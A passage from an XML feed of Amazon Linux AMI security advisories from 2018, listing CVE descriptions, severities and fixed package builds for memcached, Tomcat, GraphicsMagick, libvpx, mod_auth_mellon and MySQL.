</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.28-1.76.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-964</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-964: medium priority package update for memcached</title><issued date="2018-03-07 21:14:00" /><updated date="2018-05-10 23:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000115:
It was discovered that the memcached connections using UDP transport protocol can be abused for efficient traffic amplification distributed denial of service (DDoS) attacks. A remote attacker could send a malicious UDP request using a spoofed source IP address of a target system to memcached, causing it to send a significantly larger response to the target.
1551182:
CVE-2018-1000115 memcached: UDP server support allows spoofed traffic amplification DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000115" title="" id="CVE-2018-1000115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="memcached-debuginfo" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-debuginfo-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-devel-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-1.4.15-10.15.amzn1.i686.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-debuginfo-1.4.15-10.15.amzn1.i686.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-devel-1.4.15-10.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-965</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-965: medium priority package update for tomcat-native</title><issued date="2018-03-07 21:16:00" /><updated date="2018-03-08 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15698:
When parsing the AIA-Extension field of a client certificate, Apache Tomcat Native Connector 1.2.0 to 1.2.14 and 1.1.23 to 1.1.34 did not correctly handle fields longer than 127 bytes. The result of the parsing error was to skip the OCSP check. It was therefore possible for client certificates that should have been rejected (if the OCSP check had been made) to be accepted. Users not using OCSP checks are not affected by this vulnerability.
1540824:
CVE-2017-15698 tomcat-native: Mishandling of client certificates can allow for OCSP check bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15698" title="" id="CVE-2017-15698" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat-native" version="1.2.16" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/tomcat-native-1.2.16-1.20.amzn1.x86_64.rpm</filename></package><package name="tomcat-native-debuginfo" version="1.2.16" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/tomcat-native-debuginfo-1.2.16-1.20.amzn1.x86_64.rpm</filename></package><package name="tomcat-native" version="1.2.16" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/tomcat-native-1.2.16-1.20.amzn1.i686.rpm</filename></package><package name="tomcat-native-debuginfo" version="1.2.16" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/tomcat-native-debuginfo-1.2.16-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-966</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-966: important priority package update for GraphicsMagick</title><issued date="2018-03-07 21:35:00" /><updated date="2018-03-08 22:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5685:
CVE-2017-17915:
CVE-2017-17913:
CVE-2017-17912:
CVE-2017-17783:
CVE-2017-17782:
CVE-2017-16669:
CVE-2017-16353:
GraphicsMagick 1.3.26 is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file. There is an out-of-bounds buffer dereference because certain increments are never checked.
1512047:
CVE-2017-16353 ImageMagick, GraphicsMagick: memory information disclosure in DescribeImage function in magick/describe.c
CVE-2017-13147:
CVE-2017-11643:
CVE-2017-11641:
CVE-2017-11637:
CVE-2017-11636:
CVE-2017-11140:
CVE-2017-11139:
CVE-2017-11102:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11102" title="" id="CVE-2017-11102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11139" title="" id="CVE-2017-11139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11140" title="" id="CVE-2017-11140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11636" title="" id="CVE-2017-11636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11637" title="" id="CVE-2017-11637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11641" title="" id="CVE-2017-11641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11643" title="" id="CVE-2017-11643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13147" title="" id="CVE-2017-13147" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16353" title="" id="CVE-2017-16353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16669" title="" id="CVE-2017-16669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17782" title="" id="CVE-2017-17782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17783" title="" id="CVE-2017-17783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17912" title="" id="CVE-2017-17912" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17913" title="" id="CVE-2017-17913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17915" title="" id="CVE-2017-17915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5685" title="" id="CVE-2018-5685" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.28" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.28-1.12.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-967</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-967: low priority package update for libvpx</title><issued date="2018-03-07 21:36:00" /><updated date="2018-03-08 22:18:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-13194:
A vulnerability in the Android media framework (libvpx) related to odd frame width. Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-64710201.
1535183:
CVE-2017-13194 libvpx: denial of service (DoS) in vpx/src/vpx_image.c file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13194" title="" id="CVE-2017-13194" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libvpx-debuginfo" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-debuginfo-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-utils" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-utils-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-devel" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-devel-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-devel" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-devel-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx-debuginfo" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-debuginfo-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx-utils" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-utils-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-1.2.0-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-968</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-968: medium priority package update for mod_auth_mellon mod24_auth_mellon</title><issued date="2018-03-07 21:37:00" /><updated date="2018-03-08 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6807:
It was found that mod_auth_mellon was vulnerable to a cross-site session transfer attack. An attacker with access to one web site on a server could use the same session to get access to a different site running on the same server.
1431670:
CVE-2017-6807 mod_auth_mellon: Cross-site session transfer vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6807" title="" id="CVE-2017-6807" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.5.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-0.13.1-1.5.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-0.13.1-1.5.amzn1.i686.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.5.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.13.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.13.1-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.13.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.13.1-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.13.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.13.1-1.7.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.13.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.13.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-969</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-969: important priority package update for mysql55 mysql56 mysql57</title><issued date="2018-03-07 21:41:00" /><updated date="2018-03-08 22:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2703:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1534139:
CVE-2018-2703 mysql: sha256_password authentication DoS via hash with large rounds value
CVE-2018-2696:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1509475:
CVE-2018-2696 mysql: sha256_password authentication DoS via long password
CVE-2018-2668:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535506:
CVE-2018-2668 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2667:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535505:
CVE-2018-2667 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2665:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535504:
CVE-2018-2665 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2647:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1535503:
CVE-2018-2647 mysql: Server: Replication unspecified vulnerability (CPU Jan 2018)
CVE-2018-2646:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535502:
CVE-2018-2646 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2645:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
1535501:
CVE-2018-2645 mysql: Server: Performance Schema unspecified vulnerability (CPU Jan 2018)
CVE-2018-2640:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535500:
CVE-2018-2640 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2622:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535499:
CVE-2018-2622 mysql: Server: DDL unspecified vulnerability (CPU Jan 2018)
CVE-2018-2612:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H).
1535497:
CVE-2018-2612 mysql: InnoDB unspecified vulnerability (CPU Jan 2018)
CVE-2018-2600:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535496:
CVE-2018-2600 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2590:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535492:
CVE-2018-2590 mysql: Server: Performance Schema unspecified vulnerability (CPU Jan 2018)
CVE-2018-2586:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535491:
CVE-2018-2586 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2583:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Stored Procedure). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.8 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H).
1535490:
CVE-2018-2583 mysql: Stored Procedure unspecified vulnerability (CPU Jan 2018)
CVE-2018-2576:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535488:
CVE-2018-2576 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2573:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: GIS). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535487:
CVE-2018-2573 mysql: Server: GIS unspecified vulnerability (CPU Jan 2018)
CVE-2018-2565:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: InnoDB). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535486:
CVE-2018-2565 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2565" title="" id="CVE-2018-2565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2573" title="" id="CVE-2018-2573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2576" title="" id="CVE-2018-2576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2583" title="" id="CVE-2018-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2586" title="" id="CVE-2018-2586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2590" title="" id="CVE-2018-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2600" title="" id="CVE-2018-2600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2612" title="" id="CVE-2018-2612" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2622" title="" id="CVE-2018-2622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2640" title="" id="CVE-2018-2640" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2645" title="" id="CVE-2018-2645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2646" title="" id="CVE-2018-2646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2647" title="" id="CVE-2018-2647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2665" title="" id="CVE-2018-2665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2667" title="" id="CVE-2018-2667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2668" title="" id="CVE-2018-2668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2696" title="" id="CVE-2018-2696" type="cve" /><reference 